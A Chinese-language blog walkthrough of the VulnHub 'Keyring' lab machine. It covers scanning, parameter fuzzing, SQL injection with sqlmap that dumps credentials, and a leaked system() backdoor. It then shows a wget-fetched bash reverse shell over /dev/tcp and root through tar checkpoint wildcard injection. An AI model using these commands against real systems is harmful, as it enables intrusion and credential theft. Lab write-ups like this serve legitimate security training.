guayu-kakeru
0%

IA: Keyring

发表于 分类于

vulnhub-IA: Keyring靶场复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kakeru)-[/tmp]
└─# nmap -A 192.168.240.230
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-06 18:38 CST
Nmap scan report for 192.168.240.230 (192.168.240.230)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:eb:fd:0a:76:8a:2a:75:6e:9b:6e:7b:51:c4:28:db (RSA)
|   256 53:31:35:c0:3a:a0:48:2f:3a:79:f5:56:cd:3c:63:ee (ECDSA)
|_  256 8d:7b:d3:c9:15:61:03:b1:b5:f1:d2:ed:2c:01:55:65 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 96:BA:A0:CE:70:B8 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.01 ms 192.168.240.230 (192.168.240.230)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.97 seconds

web探测

访问80端口: 是一个登录界面

目录扫描也发现真正的登录界面在login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(root㉿kakeru)-[/tmp]
└─# dirsearch -u 192.168.240.230         
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /tmp/reports/_192.168.240.230/_25-02-06_18-40-23.txt

Target: http://192.168.240.230/

[18:40:23] Starting: 
[18:40:24] 403 -  280B  - /.ht_wsr.txt                                      
[18:40:24] 403 -  280B  - /.htaccess.bak1                                   
[18:40:24] 403 -  280B  - /.htaccess.orig
[18:40:24] 403 -  280B  - /.htaccess.sample
[18:40:24] 403 -  280B  - /.htaccess.save
[18:40:24] 403 -  280B  - /.htaccess_orig                                   
[18:40:24] 403 -  280B  - /.htaccess_extra
[18:40:24] 403 -  280B  - /.htaccessBAK
[18:40:24] 403 -  280B  - /.htaccess_sc
[18:40:24] 403 -  280B  - /.htaccessOLD
[18:40:24] 403 -  280B  - /.htaccessOLD2                                    
[18:40:24] 403 -  280B  - /.htm                                             
[18:40:24] 403 -  280B  - /.html
[18:40:24] 403 -  280B  - /.htpasswd_test                                   
[18:40:24] 403 -  280B  - /.htpasswds
[18:40:24] 403 -  280B  - /.httr-oauth
[18:40:24] 403 -  280B  - /.php                                             
[18:40:25] 302 -  561B  - /about.php  ->  index.php                         
[18:40:28] 302 -  561B  - /control.php  ->  index.php                       
[18:40:30] 302 -  561B  - /home.php  ->  index.php                          
[18:40:31] 200 -  746B  - /login.php                                        
[18:40:31] 302 -    0B  - /logout.php  ->  index.php                        
[18:40:34] 403 -  280B  - /server-status/                                   
[18:40:34] 403 -  280B  - /server-status                                    
                                                                             
Task Completed


尝试用bp爆破一下密码 但是爆破不出来
继续返回主界面,发现这里竟然也可以注册,自己输入账号密码创建一个用户,然后登录

页面提醒内容

1
2
HTTP Parameter Pollution or HPP in short is a vulnerability that occurs
due to passing of multiple parameters having same name

告诉我们有http参数污染漏洞,所以尝试用wfuzz跑参数 但是我没有成功 对wfuzz不是很熟悉
去看了下群主的视频,我的思路是没有问题的,也确实是用wfuzz,就是我用这个工具没用对
而且需要去网页里面得到cookie. 并且目录没有扫全,以后都用gobuster跑目录了。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.240.230 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt  -x .php,.txt,.html -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.240.230
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home.php             (Status: 302) [Size: 561] [--> index.php]
/login.php            (Status: 200) [Size: 1466]
/history.php          (Status: 200) [Size: 31]
/.html                (Status: 403) [Size: 280]
/.php                 (Status: 403) [Size: 280]
/about.php            (Status: 302) [Size: 561] [--> index.php]
/index.php            (Status: 200) [Size: 3254]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/control.php          (Status: 302) [Size: 561] [--> index.php]

这里的history是页面上没有显示内容的,所以大概率用这个路径
先去安装一下seclists字典 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kakeru)-[~/tmp]
└─# apt update
Get:1 http://mirrors.aliyun.com/kali kali-rolling InRelease [41.5 kB]
Get:2 http://mirrors.aliyun.com/kali kali-rolling/main arm64 Packages [20.2 MB]
Get:3 http://mirrors.aliyun.com/kali kali-rolling/main arm64 Contents (deb) [47.9 MB]
Get:4 http://mirrors.aliyun.com/kali kali-rolling/non-free arm64 Packages [148 kB]                                
Get:5 http://mirrors.aliyun.com/kali kali-rolling/non-free arm64 Contents (deb) [825 kB]                          
Get:6 http://mirrors.aliyun.com/kali kali-rolling/contrib arm64 Packages [97.3 kB]                                
Get:7 http://mirrors.aliyun.com/kali kali-rolling/contrib arm64 Contents (deb) [179 kB]                           
Fetched 69.4 MB in 13s (5,413 kB/s)                                                                               
681 packages can be upgraded. Run 'apt list --upgradable' to see them.
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# apt install seclists

然后用wfuzz进行模糊参数名 扫出user

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.240.230/history.php?FUZZ=kakeru -H 'Cookie: PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g' --hh 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.240.230/history.php?FUZZ=kakeru
Total requests: 4734

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================

000004339:   200        0 L      5 W        85 Ch       "user"                                            

Total time: 0
Processed Requests: 4734
Filtered Requests: 4733
Requests/sec.: 0

然后用这个参数污染漏洞访问admin的历史记录

1
2
3
4
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.230/history.php?user=admin -H "Cookie: PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g"
Pages visited by user admin<br><br>https://github.com/cyberbot75/keyring<br><br>

有github源码泄漏
在control.php中发现有一个注释,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

<?php
session_start();
if(isset($_SESSION['name']))
{
	$servername = "localhost";
	$username = "root";
	$password = "sqluserrootpassw0r4";
	$database = "users";

	$conn = mysqli_connect($servername, $username, $password, $database);
	$name = $_SESSION['name'];
	$date =  date('Y-m-d H:i:s');
	echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
		$sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";

		if(mysqli_query($conn,$sql))
			{
				echo "<br><br>";
				echo "Date & Time : ".$date;
			}
		system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
}
else
{
	header('Location: index.php');
}
?>

告诉我们会执行cmdcntr这个参数的命令,他没有及时删除
但是我直接在url利用发现并没有显示给我

这里卡住了,看了视频知道,这个必须是管理员的账户才能用这个后门
发现过程:把源码下载下来,用git diff找出不同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
(base) kakeru@bogon Downloads % git clone https://github.com/cyberbot75/keyring.git
Cloning into 'keyring'...
remote: Enumerating objects: 21, done.
remote: Counting objects: 100% (21/21), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 21 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (21/21), 6.26 KiB | 3.13 MiB/s, done.
Resolving deltas: 100% (9/9), done.
(base) kakeru@bogon Downloads % cd keyring 
(base) kakeru@bogon keyring % git log
commit 9215fbd50358462a5868c04bfe93ea549c101a2b (HEAD -> main, origin/main, origin/HEAD)
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date:   Mon Jun 21 19:07:49 2021 +0530

    Update control.php

commit d63d664e940253192aa05f4b5afe46204452f574
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date:   Mon Jun 21 18:33:18 2021 +0530

    Update control.php

commit 460cb9f1bf00701403393d4546797eee17121700
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date:   Thu Jun 10 18:56:41 2021 +0530

    Update control.php

commit 1a772923c80cb07d621d6e654a4e78819126e0a9
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date:   Thu Jun 10 18:55:32 2021 +0530

    Add files via upload
(base) kakeru@bogon keyring % git diff 9215fbd50358462a5868c04bfe93ea549c101a2b 460cb9f1bf00701403393d4546797eee17121700
diff --git a/html/control.php b/html/control.php
index 3bb3250..823b4c5 100644
--- a/html/control.php
+++ b/html/control.php
@@ -1,5 +1,3 @@
-Code for staging server
-
 <!DOCTYPE html>
 <html>
 <head>
@@ -53,7 +51,10 @@ if(isset($_SESSION['name']))
        $conn = mysqli_connect($servername, $username, $password, $database);
        $name = $_SESSION['name'];
        $date =  date('Y-m-d H:i:s');
-       echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
+
+       if($name==="admin")
+       {
+               echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
                $sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";
 
                if(mysqli_query($conn,$sql))
@@ -61,7 +62,12 @@ if(isset($_SESSION['name']))
                                echo "<br><br>";
                                echo "Date & Time : ".$date;
                        }
-               system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
+               system($_GET['timer']); //system() is not safe to use , dont' forget to remove it  in latest release .
+       }
:

先用sqlmap进行注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -u 192.168.240.230/history.php?user=kakeru --cookie="PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g" --batch --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:54:45 /2025-02-06/

[20:54:45] [INFO] testing connection to the target URL
[20:54:45] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:54:45] [INFO] testing if the target URL content is stable
[20:54:45] [INFO] target URL content is stable
[20:54:45] [INFO] testing if GET parameter 'user' is dynamic
[20:54:45] [INFO] GET parameter 'user' appears to be dynamic
[20:54:45] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[20:54:45] [INFO] testing for SQL injection on GET parameter 'user'
[20:54:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:54:46] [WARNING] reflective value(s) found and filtering out
[20:54:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:54:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:54:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:54:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:54:46] [INFO] testing 'Generic inline queries'
[20:54:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:54:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:54:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:54:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:54:56] [INFO] GET parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:54:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:54:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:54:56] [INFO] target URL appears to be UNION injectable with 1 columns
[20:54:56] [INFO] GET parameter 'user' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: user (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=kakeru' AND (SELECT 9710 FROM (SELECT(SLEEP(5)))Gxfh) AND 'flol'='flol

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: user=kakeru' UNION ALL SELECT CONCAT(0x7178787871,0x65647271467a6477744472684547474a74614e4e59464276706668634d4f4d5576495a45414a6b72,0x717a6a7a71)-- -
---
[20:54:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[20:54:56] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

[20:54:56] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.240.230'

[*] ending @ 20:54:56 /2025-02-06/

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -u 192.168.240.230/history.php?user=kakeru --cookie="PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g" --batch -D users --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:55:57 /2025-02-06/

[20:55:57] [INFO] resuming back-end DBMS 'mysql' 
[20:55:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=kakeru' AND (SELECT 9710 FROM (SELECT(SLEEP(5)))Gxfh) AND 'flol'='flol

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: user=kakeru' UNION ALL SELECT CONCAT(0x7178787871,0x65647271467a6477744472684547474a74614e4e59464276706668634d4f4d5576495a45414a6b72,0x717a6a7a71)-- -
---
[20:55:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[20:55:57] [INFO] fetching tables for database: 'users'
[20:55:58] [WARNING] reflective value(s) found and filtering out
Database: users
[2 tables]
+---------+
| log     |
| details |
+---------+

[20:55:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.240.230'

[*] ending @ 20:55:57 /2025-02-06/

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -u 192.168.240.230/history.php?user=kakeru --cookie="PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g" --batch -D users -T details --columns --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:56:16 /2025-02-06/

[20:56:16] [INFO] resuming back-end DBMS 'mysql' 
[20:56:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=kakeru' AND (SELECT 9710 FROM (SELECT(SLEEP(5)))Gxfh) AND 'flol'='flol

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: user=kakeru' UNION ALL SELECT CONCAT(0x7178787871,0x65647271467a6477744472684547474a74614e4e59464276706668634d4f4d5576495a45414a6b72,0x717a6a7a71)-- -
---
[20:56:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[20:56:16] [INFO] fetching columns for table 'details' in database 'users'
[20:56:16] [WARNING] reflective value(s) found and filtering out
Database: users
Table: details
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | varchar(20) |
| password | varchar(22) |
+----------+-------------+

[20:56:16] [INFO] fetching columns for table 'details' in database 'users'
[20:56:16] [INFO] fetching entries for table 'details' in database 'users'
Database: users
Table: details
[3 entries]
+--------+-----------------------+
| name   | password              |
+--------+-----------------------+
| admin  | myadmin#p4szw0r4d     |
| john   | Sup3r$S3cr3t$PasSW0RD |
| kakeru | kakeru                |
+--------+-----------------------+

[20:56:16] [INFO] table 'users.details' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.240.230/dump/users/details.csv'
[20:56:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.240.230'

[*] ending @ 20:56:16 /2025-02-06/

获取到admin密码之后登录,然后在control.php这里用?cmdcntr执行命令反弹webshell
我先试了nc的反弹shell,但是不行,所以上传一个反弹shell的php

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .        
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# ls
51224.py  aaa    b    b.txt  id_rsa    php-reverse-shell.php  reports     rockyou.txt
a         a.txt  bbb  id     pass.txt  pspy64                 reverse.sh  tmp
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

但是这样虽然接收到了,但是不知道接收之后的路径,也没法弹shell
我一开始用php-reverse-shell.php,一直没成功访问到路径,后面经过群主提醒,直接用php就可以执行。
还可以先输入命令ls -al看看权限
那就用reverse.sh来反弹shell 写到/tmp目录中,当前目录一般都是root创的没有权限

1
2
3
http://192.168.240.230/control.php?cmdcntr=wget%20192.168.240.11/reverse.sh%20-O%20/tmp/re.sh
http://192.168.240.230/control.php?cmdcntr=bash%20/tmp/re.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
                                                                                                                  
┌──(root㉿kakeru)-[~/tmp]
└─# cat reverse.sh                                                            
bash -i >& /dev/tcp/192.168.240.11/1234 0>&1
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
pwd
bash: cannot set terminal process group (627): Inappropriate ioctl for device
bash: no job control in this shell
www-data@keyring:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@keyring:/var/www/html$ pwd
/var/www/html
www-data@keyring:/var/www/html$

美化终端:

1
2
3
4
5
6
7
script -qc /bin/bash /dev/null
ctrl + z挂起
stty raw -echo; fg
reset
xterm
本机stty -a 查看自己的  rows columns
stty  rows 35 columns 115

提权

sudo 和 suid都没有可以利用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
www-data@keyring:/var/www/html$ sudp -l

Command 'sudp' not found, did you mean:

  command 'ssdp' from snap ssdp
  command 'sfdp' from deb graphviz
  command 'sup' from deb sup
  command 'sudo' from deb sudo
  command 'sudo' from deb sudo-ldap

See 'snap info <snapname>' for additional versions.

www-data@keyring:/var/www/html$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 

^C

sudo: 1 incorrect password attempt
www-data@keyring:/var/www/html$ 
www-data@keyring:/var/www/html$ 
www-data@keyring:/var/www/html$ 
www-data@keyring:/var/www/html$ find / -user root -perm -4000 -print 2>/dev/null









/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/gpasswd
/bin/ntfs-3g
/bin/umount
/bin/mount
/bin/ping
/bin/fusermount
/bin/su

去home目录下面,发现有一个john用户,刚才sqlmap也有这个用户!
可以切换到这个用户

1
2
3
4
5
6
7
8
9
www-data@keyring:/$ cd home
www-data@keyring:/home$ ls
john
www-data@keyring:/home$ su - john
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

john@keyring:~$

发现john自己目录下的一个文件有suid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
john@keyring:~$ find / -user root -perm -4000 -print 2>/dev/null
/home/john/compress
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/gpasswd
/bin/ntfs-3g
/bin/umount
/bin/mount
/bin/ping
/bin/fusermount
/bin/su

这个是个可执行文件,但是我又卡住了
看了视频,知道用string看这个文件就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > compress

john@keyring:~$ cat compress > /dev/tcp/192.168.240.11/1234
john@keyring:~$ 

┌──(root㉿kakeru)-[~/tmp]
└─# strings compress             
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/tar cf archive.tar *
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8060
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
tar.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

主要是用到了/bin/tar cf archive.tar * 我们运行之后目录下就会出现archive.tar
在gifobins找到利用方式

创建两个文件

1
2
3
4
5
6
7
8
9
10
11
12
john@keyring:~$ wget 192.168.240.11/reverse.sh 
john@keyring:~$ touch -- "--checkpoint=1"
john@keyring:~$ touch -- "--checkpoint-action=exec=bash  reverse.sh"
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234           
id
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@keyring:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1000(john)
root@keyring:~#

了解了这里–是告诉touch后面不是参数,不用识别因为文件中带–

总结:这个靶机我卡了好久,也算学了不少东西,以后都用gobuster扫目录,学了wfuzz爆破参数,源码泄漏使用git log和git diff找出历史版本的不同。最后提权稍微修改下poc就可以了

群主复盘视频地址:https://www.bilibili.com/video/BV17iP6eLEP2/?spm_id_from=333.1387.upload.video_card.click&vd_source=2971771be3c690f4dabe696dc01299f2